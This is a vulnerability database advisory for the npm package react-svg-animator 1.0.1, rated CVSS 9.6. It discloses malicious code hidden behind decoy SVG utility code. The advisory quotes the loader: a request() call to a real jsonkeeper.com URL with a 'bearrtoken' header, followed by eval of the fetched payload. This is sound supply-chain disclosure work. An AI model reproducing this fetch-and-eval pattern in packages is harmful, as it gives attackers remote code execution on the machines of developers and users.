VDB
GCVE-110-OSM-2026-1373
GCVE-110-OSM-2026-1373
Advisory PublishedCVSS 9.6/10
Executes attacker-controlled JavaScript from https://www.jsonkeeper.com/b/NGY3C via npm 'request' library + eval on every require(). The payload is buried after 80 lines of decoy SVG utility code in index.js.
index.js defines getPlugin() which calls request({ url: 'https://www.jsonkeeper.com/b/NGY3C', headers: { bearrtoken: 'logo' } }); on 200 response, eval(JSON.parse(body).model) executes the fetched code. The function is defined and implicitly available at require-time. Same jsonkeeper.com infrastructure and bearrtoken header as vite-plugin-compress-plus@0.5.4.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | react-svg-animator | 1.0.1 (affected) | — |
Browse GCVE Records
72,664 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.